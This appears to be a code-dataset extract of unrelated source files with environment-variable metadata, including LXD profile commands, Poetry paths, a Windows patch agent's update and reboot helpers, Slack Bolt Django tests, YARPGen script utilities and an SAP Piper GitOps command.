if err != nil {
return err
}
err = client.PutProfile(p, newdata)
return err
}
func doProfileDelete(client *lxd.Client, p string) error {
err := client.ProfileDelete(p)
if err == nil {
fmt.Printf(gettext.Gettext("Profile %s deleted\n"), p)
}
return err
}
func doProfileApply(client *lxd.Client, c string, p string) error {
resp, err := client.ApplyProfile(c, p)
if err == nil {
if p == "" {
p = "(none)"
}
fmt.Printf(gettext.Gettext("Profile %s applied to %s\n"), p, c)
} else {
return err
}
return client.WaitForSuccess(resp.Operation)
}
func doProfileShow(client *lxd.Client, p string) error {
resp, err := client.GetProfileConfig(p)
if err != nil {
return err
}
for k, v := range resp {
fmt.Printf("%s = %s\n", k, v)
}
dresp, err := client.ProfileListDevices(p)
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(dresp, "\n"))
return nil
}
func doProfileCopy(config *lxd.Config, client *lxd.Client, p string, args []string) error {
if len(args) != 1 {
return errArgs
}
remote, newname := config.ParseRemoteAndContainer(args[0])
if newname == "" {
newname = p
}
dest, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
return client.ProfileCopy(p, newname, dest)
}
func doProfileDevice(config *lxd.Config, args []string) error {
// profile device add b1 eth0 nic type=bridged
// profile device list b1
// profile device remove b1 eth0
if len(args) < 4 {
return errArgs
}
switch args[2] {
case "add":
return deviceAdd(config, "profile", args[1:])
case "remove":
return deviceRm(config, "profile", args[1:])
case "list":
return deviceList(config, "profile", args[1:])
default:
return errArgs
}
}
func doProfileGet(client *lxd.Client, p string, args []string) error {
// we shifted @args so so it should read "<key>"
if len(args) != 1 {
return errArgs
}
resp, err := client.GetProfileConfig(p)
if err != nil {
return err
}
for k, v := range resp {
if k == args[0] {
fmt.Printf("%s\n", v)
}
}
return nil
}
func doProfileSet(client *lxd.Client, p string, args []string) error {
// we shifted @args so so it should read "<key> [<value>]"
if len(args) < 1 {
return errArgs
}
key := args[0]
var value string
if len(args) < 2 {
value = ""
} else {
value = args[1]
}
err := client.SetProfileConfigItem(p, key, value)
return err
}
func doProfileList(config *lxd.Config, args []string) error {
var remote string
if len(args) > 2 {
var name string
remote, name = config.ParseRemoteAndContainer(args[2])
if name != "" {
return fmt.Errorf(gettext.Gettext("Cannot provide container name to list"))
}
} else {
remote = config.DefaultRemote
}
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
profiles, err := client.ListProfiles()
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(profiles, "\n"))
return nil
}
func deviceAdd(config *lxd.Config, which string, args []string) error {
if len(args) < 5 {
return errArgs
}
remote, name := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
devname := args[3]
devtype := args[4]
var props []string
if len(args) > 5 {
props = args[5:]
} else {
props = []string{}
}
var resp *lxd.Response
if which == "profile" {
resp, err = client.ProfileDeviceAdd(name, devname, devtype, props)
} else {
resp, err = client.ContainerDeviceAdd(name, devname, devtype, props)
}
if err != nil {
return err
}
fmt.Printf(gettext.Gettext("Device %s added to %s\n"), devname, name)
if which == "profile" {
return nil
}
return client.WaitForSuccess(resp.Operation)
}
func deviceRm(config *lxd.Config, which string, args []string) error {
if len(args) < 4 {
return errArgs
}
remote, name := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
devname := args[3]
var resp *lxd.Response
if which == "profile" {
resp, err = client.ProfileDeviceDelete(name, devname)
} else {
resp, err = client.ContainerDeviceDelete(name, devname)
}
if err != nil {
return err
}
fmt.Printf(gettext.Gettext("Device %s removed from %s\n"), devname, name)
if which == "profile" {
return nil
}
return client.WaitForSuccess(resp.Operation)
}
func deviceList(config *lxd.Config, which string, args []string) error {
if len(args) < 3 {
return errArgs
}
remote, name := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
var resp []string
if which == "profile" {
resp, err = client.ProfileListDevices(name)
} else {
resp, err = client.ContainerListDevices(name)
}
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(resp, "\n"))
return nil
}
| [
"\"VISUAL\"",
"\"EDITOR\""
]
| []
| [
"VISUAL",
"EDITOR"
]
| [] | ["VISUAL", "EDITOR"] | go | 2 | 0 | |
src/poetry/locations.py | import os
from pathlib import Path
from poetry.utils.appdirs import user_cache_dir
from poetry.utils.appdirs import user_config_dir
from poetry.utils.appdirs import user_data_dir
CACHE_DIR = user_cache_dir("pypoetry")
DATA_DIR = user_data_dir("pypoetry")
CONFIG_DIR = user_config_dir("pypoetry")
REPOSITORY_CACHE_DIR = Path(CACHE_DIR) / "cache" / "repositories"
def data_dir() -> Path:
poetry_home = os.getenv("POETRY_HOME")
if poetry_home:
return Path(poetry_home).expanduser()
return Path(user_data_dir("pypoetry", roaming=True))
| []
| []
| [
"POETRY_HOME"
]
| [] | ["POETRY_HOME"] | python | 1 | 0 | |
ospatchog/system_windows.go | // Copyright 2019 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//+build !test
package ospatchog
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"time"
"github.com/GoogleCloudPlatform/guest-logging-go/logger"
"golang.org/x/sys/windows/registry"
)
// disableAutoUpdates disables system auto updates.
func disableAutoUpdates() {
k, openedExisting, err := registry.CreateKey(registry.LOCAL_MACHINE, `SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU`, registry.ALL_ACCESS)
if err != nil {
logger.Errorf("error disabling Windows auto updates, error: %v", err)
}
defer k.Close()
if openedExisting {
val, _, err := k.GetIntegerValue("NoAutoUpdate")
if err == nil && val == 1 {
return
}
}
logger.Debugf("Disabling Windows Auto Updates")
if err := k.SetDWordValue("NoAutoUpdate", 1); err != nil {
logger.Errorf("error disabling Windows auto updates, error: %v", err)
}
if _, err := os.Stat(`C:\Program Files\Google\Compute Engine\tools\auto_updater.ps1`); err == nil {
logger.Debugf("Removing google-compute-engine-auto-updater package")
f := func() error {
out, err := exec.Command(googet, "-noconfirm", "remove", "google-compute-engine-auto-updater").CombinedOutput()
if err != nil {
return fmt.Errorf("%v, out: %s", err, out)
}
return nil
}
if err := retry(1*time.Minute, "removing google-compute-engine-auto-updater package", logger.Debugf, f); err != nil {
logger.Errorf("Error removing google-compute-engine-auto-updater: %v", err)
}
}
}
func rebootSystem() error {
root := os.Getenv("SystemRoot")
if root == "" {
root = `C:\Windows`
}
return exec.Command(filepath.Join(root, `System32\shutdown.exe`), "/r", "/t", "00", "/f", "/d", "p:2:3").Run()
}
| [
"\"SystemRoot\""
]
| []
| [
"SystemRoot"
]
| [] | ["SystemRoot"] | go | 1 | 0 | |
tests/adapter_tests/django/test_django.py | import json
import os
from time import time
from urllib.parse import quote
from django.test import TestCase
from django.test.client import RequestFactory
from slack_sdk.signature import SignatureVerifier
from slack_sdk.web import WebClient
from slack_bolt.adapter.django import SlackRequestHandler
from slack_bolt.app import App
from slack_bolt.oauth.oauth_settings import OAuthSettings
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
assert_auth_test_count,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
class TestDjango(TestCase):
signing_secret = "secret"
valid_token = "xoxb-valid"
mock_api_server_base_url = "http://localhost:8888"
signature_verifier = SignatureVerifier(signing_secret)
web_client = WebClient(
token=valid_token,
base_url=mock_api_server_base_url,
)
os.environ[
"DJANGO_SETTINGS_MODULE"
] = "tests.adapter_tests.django.test_django_settings"
rf = RequestFactory()
def setUp(self):
self.old_os_env = remove_os_env_temporarily()
setup_mock_web_api_server(self)
def tearDown(self):
cleanup_mock_web_api_server(self)
restore_os_env(self.old_os_env)
def generate_signature(self, body: str, timestamp: str):
return self.signature_verifier.generate_signature(
body=body,
timestamp=timestamp,
)
def build_headers(self, timestamp: str, body: str):
return {
"x-slack-signature": [self.generate_signature(body, timestamp)],
"x-slack-request-timestamp": [timestamp],
}
def test_events(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def event_handler():
pass
app.event("app_mention")(event_handler)
input = {
"token": "verification_token",
"team_id": "T111",
"enterprise_id": "E111",
"api_app_id": "A111",
"event": {
"client_msg_id": "9cbd4c5b-7ddf-4ede-b479-ad21fca66d63",
"type": "app_mention",
"text": "<@W111> Hi there!",
"user": "W222",
"ts": "1595926230.009600",
"team": "T111",
"channel": "C111",
"event_ts": "1595926230.009600",
},
"type": "event_callback",
"event_id": "Ev111",
"event_time": 1595926230,
"authed_users": ["W111"],
}
timestamp, body = str(int(time())), json.dumps(input)
request = self.rf.post(
"/slack/events", data=body, content_type="application/json"
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_shortcuts(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def shortcut_handler(ack):
ack()
app.shortcut("test-shortcut")(shortcut_handler)
input = {
"type": "shortcut",
"token": "verification_token",
"action_ts": "111.111",
"team": {
"id": "T111",
"domain": "workspace-domain",
"enterprise_id": "E111",
"enterprise_name": "Org Name",
},
"user": {"id": "W111", "username": "primary-owner", "team_id": "T111"},
"callback_id": "test-shortcut",
"trigger_id": "111.111.xxxxxx",
}
timestamp, body = str(int(time())), f"payload={quote(json.dumps(input))}"
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_commands(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def command_handler(ack):
ack()
app.command("/hello-world")(command_handler)
input = (
"token=verification_token"
"&team_id=T111"
"&team_domain=test-domain"
"&channel_id=C111"
"&channel_name=random"
"&user_id=W111"
"&user_name=primary-owner"
"&command=%2Fhello-world"
"&text=Hi"
"&enterprise_id=E111"
"&enterprise_name=Org+Name"
"&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT111%2F111%2Fxxxxx"
"&trigger_id=111.111.xxx"
)
timestamp, body = str(int(time())), input
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_commands_process_before_response(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
process_before_response=True,
)
def command_handler(ack):
ack()
app.command("/hello-world")(command_handler)
input = (
"token=verification_token"
"&team_id=T111"
"&team_domain=test-domain"
"&channel_id=C111"
"&channel_name=random"
"&user_id=W111"
"&user_name=primary-owner"
"&command=%2Fhello-world"
"&text=Hi"
"&enterprise_id=E111"
"&enterprise_name=Org+Name"
"&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT111%2F111%2Fxxxxx"
"&trigger_id=111.111.xxx"
)
timestamp, body = str(int(time())), input
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_commands_lazy(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def command_handler(ack):
ack()
def lazy_handler():
pass
app.command("/hello-world")(ack=command_handler, lazy=[lazy_handler])
input = (
"token=verification_token"
"&team_id=T111"
"&team_domain=test-domain"
"&channel_id=C111"
"&channel_name=random"
"&user_id=W111"
"&user_name=primary-owner"
"&command=%2Fhello-world"
"&text=Hi"
"&enterprise_id=E111"
"&enterprise_name=Org+Name"
"&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT111%2F111%2Fxxxxx"
"&trigger_id=111.111.xxx"
)
timestamp, body = str(int(time())), input
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_oauth(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
oauth_settings=OAuthSettings(
client_id="111.111",
client_secret="xxx",
scopes=["chat:write", "commands"],
),
)
request = self.rf.get("/slack/install")
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert response.get("content-type") == "text/html; charset=utf-8"
assert "https://slack.com/oauth/v2/authorize?state=" in response.content.decode(
"utf-8"
)
| []
| []
| [
"DJANGO_SETTINGS_MODULE\"\n "
]
| [] | ["DJANGO_SETTINGS_MODULE\"\n "] | python | 1 | 0 | |
scripts/common.py | #!/usr/bin/python3
###############################################################################
#
# Copyright (c) 2015-2020, Intel Corporation
# Copyright (c) 2019-2020, University of Utah
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
"""
File for common data and functions, which are used in scripts
"""
###############################################################################
import collections
import datetime
import enum
import errno
import logging
import os
import shutil
import signal
import subprocess
import sys
scripts_dir_name = "scripts"
# $YARPGEN_HOME environment variable should be set to YARPGen directory
yarpgen_home = os.environ["YARPGEN_HOME"] if "YARPGEN_HOME" in os.environ else os.getcwd()
yarpgen_scripts = os.path.join(os.environ["YARPGEN_HOME"], scripts_dir_name) if "YARPGEN_HOME" in os.environ else os.getcwd()
yarpgen_version_str = ""
main_logger_name = "main_logger"
main_logger = None
__duplicate_err_to_stderr__ = False
stat_logger_name = "stat_logger"
stat_logger = None
@enum.unique
class StdID(enum.IntEnum):
# Better to use enum.auto, but it is available only since python3.6
C = enum.auto()
CXX = enum.auto()
SYCL = enum.auto()
ISPC = enum.auto()
MAX_STD_ID = enum.auto()
def is_c (self):
return self.value == StdID.C
def is_cxx (self):
return self.value == StdID.CXX or \
self.value == StdID.SYCL or \
self.value == StdID.ISPC
''' Enum doesn't allow to use '++' in names, so we need this function. '''
@staticmethod
def get_pretty_std_name (std_id):
if std_id == StdID.CXX:
return std_id.name.replace("CXX", "c++")
return std_id.name.lower()
''' Enum doesn't allow to use '++' in names, so we need this function. '''
def get_full_pretty_std_name (self):
if self.is_cxx():
return "c++11"
return "c99"
''' Easy way to convert string to StdID '''
StrToStdID = collections.OrderedDict()
for i in StdID:
if not i.name.startswith("MAX"):
StrToStdID[StdID.get_pretty_std_name(i)] = i
selected_standard = None
def get_file_ext():
if selected_standard.is_c():
return ".c"
if selected_standard.is_cxx():
return ".cpp"
return None
def append_file_ext(file):
if (file.startswith("func") and selected_standard == StdID.ISPC):
return file + ".ispc"
if selected_standard.is_c():
return file + ".c"
if selected_standard.is_cxx():
return file + ".cpp"
return None
def set_standard(std_str):
global selected_standard
selected_standard = StrToStdID[std_str]
def get_standard ():
global selected_standard
return StdID.get_pretty_std_name(selected_standard)
def check_if_std_defined ():
if selected_standard is None or \
selected_standard == StdID.MAX_STD_ID:
print_and_exit("Language standard wasn't selected!")
def print_and_exit(msg):
log_msg(logging.ERROR, msg)
exit(-1)
def setup_logger(log_file, log_level):
global main_logger
main_logger = logging.getLogger(main_logger_name)
formatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")
main_logger.setLevel(log_level)
if log_file is not None:
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(formatter)
main_logger.addHandler(file_handler)
global __duplicate_err_to_stderr__
__duplicate_err_to_stderr__ = True
else:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
main_logger.addHandler(stream_handler)
def wrap_log_file(log_file, default_log_file):
if log_file == default_log_file:
log_file = log_file.replace(".log", "")
return log_file + "_" + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + ".log"
else:
return log_file
def log_msg(log_level, message, forced_duplication = False):
global main_logger
main_logger.log(log_level, message)
if __duplicate_err_to_stderr__ and (log_level == logging.ERROR or forced_duplication):
sys.stderr.write("\n" + str(message) + "\n")
sys.stderr.flush()
class StatisticsFileHandler(logging.FileHandler):
def emit(self, record):
if self.stream is None:
self.stream = self._open()
logging.StreamHandler.emit(self, record)
self.close()
def setup_stat_logger(log_file):
global stat_logger
stat_logger = logging.getLogger(stat_logger_name)
if log_file is not None:
stat_handler = StatisticsFileHandler(filename=log_file, mode="w", delay=True)
stat_logger.addHandler(stat_handler)
stat_logger.setLevel(logging.INFO)
def check_python_version():
if sys.version_info < (3, 3):
print_and_exit("This script requires at least python 3.3.")
def check_and_open_file(file_name, mode):
norm_file_name = os.path.abspath(file_name)
if not os.path.isfile(norm_file_name):
print_and_exit("File " + norm_file_name + " doesn't exist and can't be opened")
return open(norm_file_name, mode)
def check_and_copy(src, dst):
if not isinstance(src, str) or not isinstance(dst, str):
print_and_exit("Src and dst should be strings")
norm_src = os.path.abspath(src)
norm_dst = os.path.abspath(dst)
if os.path.exists(norm_src):
log_msg(logging.DEBUG, "Copying " + norm_src + " to " + norm_dst)
if os.path.isfile(norm_src):
shutil.copy(norm_src, norm_dst)
elif os.path.isdir(norm_src):
# for directories, destination should be not the dir where it will be
# copied to, but the new directory name. I.e. copying "abc" to ".." we
# need to provide destination as "../abc".
shutil.copytree(norm_src, norm_dst + os.sep + os.path.basename(src))
else:
print_and_exit("Can't copy " + norm_src)
else:
print_and_exit("File " + norm_src + " wasn't found")
def copy_test_to_out(test_dir, out_dir, lock):
log_msg(logging.DEBUG, "Copying " + test_dir + " to " + out_dir)
lock.acquire()
try:
shutil.copytree(test_dir, out_dir)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
finally:
lock.release()
def check_if_dir_exists(directory):
norm_dir = os.path.abspath(directory)
if not os.path.exists(norm_dir) or not os.path.isdir(norm_dir):
return False
return True
def check_dir_and_create(directory):
norm_dir = os.path.abspath(directory)
if not os.path.exists(norm_dir):
log_msg(logging.DEBUG, "Creating '" + str(norm_dir) + "' directory")
os.makedirs(norm_dir)
elif not os.path.isdir(norm_dir):
print_and_exit("Can't use '" + norm_dir + "' directory")
def run_cmd(cmd, time_out=None, num=-1, memory_limit=None):
is_time_expired = False
shell = False
if memory_limit is not None:
shell = True
new_cmd = "ulimit -v " + str(memory_limit) + " ; "
new_cmd += " ".join(i for i in cmd)
cmd = new_cmd
start_time = os.times()
with subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, start_new_session=True, shell=shell) as process:
try:
log_msg_str = "Running " + str(cmd)
if num != -1:
log_msg_str += " in process " + str(num)
if time_out is None:
log_msg_str += " without timeout"
else:
log_msg_str += " with " + str(time_out) + " timeout"
log_msg(logging.DEBUG, log_msg_str)
output, err_output = process.communicate(timeout=time_out)
ret_code = process.poll()
except subprocess.TimeoutExpired:
log_msg(logging.DEBUG, "Timeout triggered for proc num " + str(process.pid) + " sending kill signal to group")
# Sigterm is good enough here and compared to sigkill gives a chance to the processes
# to clean up after themselves.
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
# once in a while stdout/stderr may not exist when the process is killed, so using try.
try:
output, err_output = process.communicate()
except ValueError:
output = b''
err_output = b''
log_msg(logging.DEBUG, "Procces " + str(process.pid) + " has finally died")
is_time_expired = True
ret_code = None
except:
log_msg(logging.ERROR, str(cmd) + " failed: unknown exception (proc num "+ str(process.pid) + ")")
# Something really bad is going on, so better to send sigkill
os.killpg(os.getpgid(process.pid), signal.SIGKILL)
process.wait()
log_msg(logging.DEBUG, "Procces " + str(process.pid) + " has finally died")
raise
end_time = os.times()
elapsed_time = end_time.children_user - start_time.children_user + \
end_time.children_system - start_time.children_system
return ret_code, output, err_output, is_time_expired, elapsed_time
def if_exec_exist(program):
def is_exe(file_path):
return os.path.isfile(file_path) and os.access(file_path, os.X_OK)
log_msg(logging.DEBUG, "Checking if " + str(program) + " exists")
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
log_msg(logging.DEBUG, "Exec " + program + " was found at " + program)
return True
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
log_msg(logging.DEBUG, "Exec " + program + " was found at " + exe_file)
return True
log_msg(logging.DEBUG, "Exec wasn't found")
return False
def clean_dir(path):
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
| []
| []
| [
"PATH",
"YARPGEN_HOME"
]
| [] | ["PATH", "YARPGEN_HOME"] | python | 2 | 0 | |
cmd/gitopsUpdateDeployment_generated.go | // Code generated by piper's step-generator. DO NOT EDIT.
package cmd
import (
"fmt"
"os"
"time"
"github.com/SAP/jenkins-library/pkg/config"
"github.com/SAP/jenkins-library/pkg/log"
"github.com/SAP/jenkins-library/pkg/splunk"
"github.com/SAP/jenkins-library/pkg/telemetry"
"github.com/SAP/jenkins-library/pkg/validation"
"github.com/spf13/cobra"
)
type gitopsUpdateDeploymentOptions struct {
BranchName string `json:"branchName,omitempty"`
CommitMessage string `json:"commitMessage,omitempty"`
ServerURL string `json:"serverUrl,omitempty"`
Username string `json:"username,omitempty"`
Password string `json:"password,omitempty"`
FilePath string `json:"filePath,omitempty"`
ContainerName string `json:"containerName,omitempty"`
ContainerRegistryURL string `json:"containerRegistryUrl,omitempty"`
ContainerImageNameTag string `json:"containerImageNameTag,omitempty"`
ChartPath string `json:"chartPath,omitempty"`
HelmValues []string `json:"helmValues,omitempty"`
DeploymentName string `json:"deploymentName,omitempty"`
Tool string `json:"tool,omitempty" validate:"possible-values=kubectl helm kustomize"`
}
// GitopsUpdateDeploymentCommand Updates Kubernetes Deployment Manifest in an Infrastructure Git Repository
func GitopsUpdateDeploymentCommand() *cobra.Command {
const STEP_NAME = "gitopsUpdateDeployment"
metadata := gitopsUpdateDeploymentMetadata()
var stepConfig gitopsUpdateDeploymentOptions
var startTime time.Time
var logCollector *log.CollectorHook
var splunkClient *splunk.Splunk
telemetryClient := &telemetry.Telemetry{}
var createGitopsUpdateDeploymentCmd = &cobra.Command{
Use: STEP_NAME,
Short: "Updates Kubernetes Deployment Manifest in an Infrastructure Git Repository",
Long: `This step allows you to update the deployment manifest for Kubernetes in a git repository.
It can for example be used for GitOps scenarios where the update of the manifests triggers an update of the corresponding deployment in Kubernetes.
As of today, it supports the update of deployment yaml files via kubectl patch, update a whole helm template and kustomize.
For *kubectl* the container inside the yaml must be described within the following hierarchy: ` + "`" + `{"spec":{"template":{"spec":{"containers":[{...}]}}}}` + "`" + `
For *helm* the whole template is generated into a single file (` + "`" + `filePath` + "`" + `) and uploaded into the repository.
For *kustomize* the ` + "`" + `images` + "`" + ` section will be update with the current image.`,
PreRunE: func(cmd *cobra.Command, _ []string) error {
startTime = time.Now()
log.SetStepName(STEP_NAME)
log.SetVerbose(GeneralConfig.Verbose)
GeneralConfig.GitHubAccessTokens = ResolveAccessTokens(GeneralConfig.GitHubTokens)
path, _ := os.Getwd()
fatalHook := &log.FatalHook{CorrelationID: GeneralConfig.CorrelationID, Path: path}
log.RegisterHook(fatalHook)
err := PrepareConfig(cmd, &metadata, STEP_NAME, &stepConfig, config.OpenPiperFile)
if err != nil {
log.SetErrorCategory(log.ErrorConfiguration)
return err
}
log.RegisterSecret(stepConfig.Username)
log.RegisterSecret(stepConfig.Password)
if len(GeneralConfig.HookConfig.SentryConfig.Dsn) > 0 {
sentryHook := log.NewSentryHook(GeneralConfig.HookConfig.SentryConfig.Dsn, GeneralConfig.CorrelationID)
log.RegisterHook(&sentryHook)
}
if len(GeneralConfig.HookConfig.SplunkConfig.Dsn) > 0 {
splunkClient = &splunk.Splunk{}
logCollector = &log.CollectorHook{CorrelationID: GeneralConfig.CorrelationID}
log.RegisterHook(logCollector)
}
validation, err := validation.New(validation.WithJSONNamesForStructFields(), validation.WithPredefinedErrorMessages())
if err != nil {
return err
}
if err = validation.ValidateStruct(stepConfig); err != nil {
log.SetErrorCategory(log.ErrorConfiguration)
return err
}
return nil
},
Run: func(_ *cobra.Command, _ []string) {
stepTelemetryData := telemetry.CustomData{}
stepTelemetryData.ErrorCode = "1"
handler := func() {
config.RemoveVaultSecretFiles()
stepTelemetryData.Duration = fmt.Sprintf("%v", time.Since(startTime).Milliseconds())
stepTelemetryData.ErrorCategory = log.GetErrorCategory().String()
stepTelemetryData.PiperCommitHash = GitCommit
telemetryClient.SetData(&stepTelemetryData)
telemetryClient.Send()
if len(GeneralConfig.HookConfig.SplunkConfig.Dsn) > 0 {
splunkClient.Send(telemetryClient.GetData(), logCollector)
}
}
log.DeferExitHandler(handler)
defer handler()
telemetryClient.Initialize(GeneralConfig.NoTelemetry, STEP_NAME)
if len(GeneralConfig.HookConfig.SplunkConfig.Dsn) > 0 {
splunkClient.Initialize(GeneralConfig.CorrelationID,
GeneralConfig.HookConfig.SplunkConfig.Dsn,
GeneralConfig.HookConfig.SplunkConfig.Token,
GeneralConfig.HookConfig.SplunkConfig.Index,
GeneralConfig.HookConfig.SplunkConfig.SendLogs)
}
gitopsUpdateDeployment(stepConfig, &stepTelemetryData)
stepTelemetryData.ErrorCode = "0"
log.Entry().Info("SUCCESS")
},
}
addGitopsUpdateDeploymentFlags(createGitopsUpdateDeploymentCmd, &stepConfig)
return createGitopsUpdateDeploymentCmd
}
func addGitopsUpdateDeploymentFlags(cmd *cobra.Command, stepConfig *gitopsUpdateDeploymentOptions) {
cmd.Flags().StringVar(&stepConfig.BranchName, "branchName", `master`, "The name of the branch where the changes should get pushed into.")
cmd.Flags().StringVar(&stepConfig.CommitMessage, "commitMessage", os.Getenv("PIPER_commitMessage"), "The commit message of the commit that will be done to do the changes.")
cmd.Flags().StringVar(&stepConfig.ServerURL, "serverUrl", `https://github.com`, "GitHub server url to the repository.")
cmd.Flags().StringVar(&stepConfig.Username, "username", os.Getenv("PIPER_username"), "User name for git authentication")
cmd.Flags().StringVar(&stepConfig.Password, "password", os.Getenv("PIPER_password"), "Password/token for git authentication.")
cmd.Flags().StringVar(&stepConfig.FilePath, "filePath", os.Getenv("PIPER_filePath"), "Relative path in the git repository to the deployment descriptor file that shall be updated. For different tools this has different semantics:\n\n * `kubectl` - path to the `deployment.yaml` that should be patched. Supports globbing.\n * `helm` - path where the helm chart will be generated into. Here no globbing is supported.\n * `kustomize` - path to the `kustomization.yaml`. Supports globbing.\n")
cmd.Flags().StringVar(&stepConfig.ContainerName, "containerName", os.Getenv("PIPER_containerName"), "The name of the container to update")
cmd.Flags().StringVar(&stepConfig.ContainerRegistryURL, "containerRegistryUrl", os.Getenv("PIPER_containerRegistryUrl"), "http(s) url of the Container registry where the image is located")
cmd.Flags().StringVar(&stepConfig.ContainerImageNameTag, "containerImageNameTag", os.Getenv("PIPER_containerImageNameTag"), "Container image name with version tag to annotate in the deployment configuration.")
cmd.Flags().StringVar(&stepConfig.ChartPath, "chartPath", os.Getenv("PIPER_chartPath"), "Defines the chart path for deployments using helm. Globbing is supported to merge multiple charts into one resource.yaml that will be commited.")
cmd.Flags().StringSliceVar(&stepConfig.HelmValues, "helmValues", []string{}, "List of helm values as YAML file reference or URL (as per helm parameter description for `-f` / `--values`)")
cmd.Flags().StringVar(&stepConfig.DeploymentName, "deploymentName", os.Getenv("PIPER_deploymentName"), "Defines the name of the deployment. In case of `kustomize` this is the name or alias of the image in the `kustomization.yaml`")
cmd.Flags().StringVar(&stepConfig.Tool, "tool", `kubectl`, "Defines the tool which should be used to update the deployment description.")
cmd.MarkFlagRequired("branchName")
cmd.MarkFlagRequired("serverUrl")
cmd.MarkFlagRequired("username")
cmd.MarkFlagRequired("password")
cmd.MarkFlagRequired("filePath")
cmd.MarkFlagRequired("containerRegistryUrl")
cmd.MarkFlagRequired("containerImageNameTag")
cmd.MarkFlagRequired("tool")
}
// retrieve step metadata
func gitopsUpdateDeploymentMetadata() config.StepData {
var theMetaData = config.StepData{
Metadata: config.StepMetadata{
Name: "gitopsUpdateDeployment",
Aliases: []config.Alias{},
Description: "Updates Kubernetes Deployment Manifest in an Infrastructure Git Repository",
},
Spec: config.StepSpec{
Inputs: config.StepInputs{
Secrets: []config.StepSecrets{
{Name: "gitHttpsCredentialsId", Description: "Jenkins 'Username with password' credentials ID containing username/password for http access to your git repository.", Type: "jenkins"},
},
Resources: []config.StepResources{
{Name: "deployDescriptor", Type: "stash"},
},
Parameters: []config.StepParameters{
{
Name: "branchName",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: `master`,
},
{
Name: "commitMessage",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_commitMessage"),
},
{
Name: "serverUrl",
ResourceRef: []config.ResourceReference{},
Scope: []string{"GENERAL", "PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{{Name: "githubServerUrl"}},
Default: `https://github.com`,
},
{
Name: "username",
ResourceRef: []config.ResourceReference{
{
Name: "gitHttpsCredentialsId",
Param: "username",
Type: "secret",
},
{
Name: "gitHttpsCredentialVaultSecretName",
Type: "vaultSecret",
Default: "gitHttpsCredential",
},
},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
